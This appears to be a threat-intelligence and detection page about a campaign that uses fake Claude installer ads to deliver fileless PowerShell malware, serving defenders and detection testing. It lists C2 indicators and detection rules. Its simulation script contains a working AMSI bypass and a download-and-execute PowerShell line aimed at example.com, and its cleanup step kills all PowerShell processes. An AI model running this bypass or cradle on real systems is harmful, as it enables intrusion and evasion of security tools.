Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The InstallFix campaign spreads malware through malicious Google Ads that imitate Claude AI installer pages. Victims are persuaded to run PowerShell commands that invoke mshta.exe to retrieve a polyglot ZIP and HTA file, which then launches a multi-stage, fileless infection chain. The payload disables SSL validation and AMSI protections, downloads additional code from a victim-specific command-and-control domain, and creates persistence through scheduled tasks. The operation has targeted organizations across multiple industries and regions worldwide.
Investigation
Researchers traced the full execution flow from the fake installer page through mshta.exe, VBScript, and several layers of encoded PowerShell. Deobfuscation showed that the malware generated a unique identifier for each victim and used it to build a host-specific command-and-control URL. Network telemetry revealed outbound communication to multiple malicious domains and IP addresses. Although the final payload was not fully recovered, observed behavior suggested data collection and exfiltration activity.
Mitigation
Defenders should block access to the identified malicious domains and IP addresses and restrict use of mshta.exe and other legacy scripting tools wherever possible. Endpoint security controls should be tuned to detect AMSI bypass attempts and SSL validation tampering. Organizations should also enforce strict URL filtering for Google Ads traffic that leads to software installer pages. User awareness remains critical, especially around the risk of running commands copied from sponsored search results or unverified sources.
Response
Security teams should alert on process chains in which mshta.exe launches cmd.exe, powershell.exe, or script interpreters with suspicious remote URLs. Those events should be correlated with scheduled task creation and outbound connections to the known command-and-control infrastructure. If activity is confirmed, defenders should contain the host, terminate the malicious processes, and remove any persistence mechanisms such as scheduled tasks. A forensic review should then be performed to identify any remaining fileless payload components.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions recon_google_ads["<b>Action</b> – <b>T1593.002 Search Open Websites/Domains: Search Engines</b><br/><b>Description</b>: Adversary places malicious sponsored results on Google to lure victims searching for Claude AI."] class recon_google_ads action initial_access_phishing["<b>Action</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/><b>Description</b>: Victim clicks a malicious ad and is redirected to a fake Claude installer page that hosts a PowerShell command."] class initial_access_phishing action user_exec_copy_paste["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies the displayed PowerShell command and runs it in a console."] class user_exec_copy_paste action execution_mshta["<b>Action</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/><b>Description</b>: PowerShell invokes mshta.exe with a URL to a polyglot HTA/MSIX bundle."] class execution_mshta action execution_htavbscript["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: HTA VBScript runs via mshta, uses Shell.Application COM object to launch cmd.exe."] class execution_htavbscript action execution_powershell_stager["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: PowerShell stager is base64u2011encoded, split into variables and XORu2011decoded with key u201cAMSI_RESULT_NOT_DETECTEDu201d."] class execution_powershell_stager action defense_evasion_amsi["<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/><b>Description</b>: Script disables SSL certificate validation and patches AMSI to bypass detection."] class defense_evasion_amsi action persistence_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: Malware creates a scheduled task to relaunch the payload after system reboot."] class persistence_scheduled_task action collection_automated["<b>Action</b> – <b>T1119 Automated Collection</b><br/><b>Description</b>: Collects eu2011wallet application data and browser data from the compromised host."] class collection_automated action exfiltration_automated["<b>Action</b> – <b>T1020 Automated Exfiltration</b> & <b>T1029 Scheduled Transfer</b><br/><b>Description</b>: Collected data is sent to attackeru2011controlled domains such as https://oakenfjrod.ru and IPs 104.21.0.95, 185.177.239.255."] class exfiltration_automated action %% Nodes u2013 Tools / Processes tool_mshta["<b>Tool</b> – <b>Name</b>: mshta.exe<br/><b>Purpose</b>: Executes HTML Application files."] class tool_mshta tool tool_cmd["<b>Tool</b> – <b>Name</b>: cmd.exe<br/><b>Purpose</b>: Windows commandu2011line interpreter."] class tool_cmd tool tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Purpose</b>: Scripting engine used for payload delivery and decoding."] class tool_powershell tool tool_amsi_patch["<b>Tool</b> – <b>Name</b>: AMSI Patch<br/><b>Purpose</b>: Alters Antimalware Scan Interface to suppress detection."] class tool_amsi_patch tool tool_schtasks["<b>Tool</b> – <b>Name</b>: schtasks.exe<br/><b>Purpose</b>: Creates and manages scheduled tasks."] class tool_schtasks tool %% Connections u2013 Flow recon_google_ads –>|leads_to| initial_access_phishing initial_access_phishing –>|leads_to| user_exec_copy_paste user_exec_copy_paste –>|executes| tool_powershell tool_powershell –>|calls| execution_mshta execution_mshta –>|uses| tool_mshta execution_mshta –>|downloads| execution_htavbscript execution_htavbscript –>|spawns| tool_cmd tool_cmd –>|runs| execution_powershell_stager execution_powershell_stager –>|uses| tool_powershell execution_powershell_stager –>|applies| defense_evasion_amsi defense_evasion_amsi –>|uses| tool_amsi_patch defense_evasion_amsi –>|creates| persistence_scheduled_task persistence_scheduled_task –>|uses| tool_schtasks persistence_scheduled_task –>|enables| collection_automated collection_automated –>|triggers| exfiltration_automated "
Attack Flow
Detections
Suspicious Powershell Strings (via powershell)
View
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Suspicious Scheduled Task (via audit)
View
IOCs (HashSha256) to detect: InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise
View
IOCs (HashSha1) to detect: InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise
View
IOCs (SourceIP) to detect: InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise
View
IOCs (DestinationIP) to detect: InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise
View
InstallFix Campaign PowerShell Evasion Techniques [Windows Powershell]
View
InstallFix Campaign – Mshta.exe Spawning Cmd.exe and PowerShell.exe [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
The attacker obtains a malicious PowerShell script via a spear‑phishing link (T1566.002) that downloads a payload from a compromised server. To avoid AMSI detection, the script injects the stringAMSI_RESULT_NOT_DETECTEDinto the process memory, then uses theIEXoperator to execute the downloaded code. The entire command is Base64‑encoded and launched with the-EncodedCommandflag, satisfying all three selector strings in the Sigma rule.Step‑by‑step:
- Download the malicious payload (a simple PowerShell one‑liner that writes a file).
- Inject AMSI bypass marker by setting the private static field
amsiInitFailed. - Execute the payload via
IEX. - Launch the whole chain using
powershell.exe -EncodedCommand ….
-
Regression Test Script:
# InstallFix‑style PowerShell attack simulation # ------------------------------------------------- # 1. Define the malicious one‑liner $malicious = @" `$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') .GetField('amsiInitFailed','NonPublic,Static') `$bypass.SetValue(`$null,$true) IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1') "@ # 2. Encode the script in UTF‑16LE and then Base64 (PowerShell's requirement) $bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious) $encoded = [Convert]::ToBase64String($bytes) # 3. Execute via powershell.exe with -EncodedCommand flag $command = "powershell.exe -NoProfile -EncodedCommand $encoded" Write-Host "Launching malicious PowerShell..." Invoke-Expression $command -
Cleanup Commands:
# Remove any temporary files and terminate lingering processes Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Write-Host "Cleanup complete."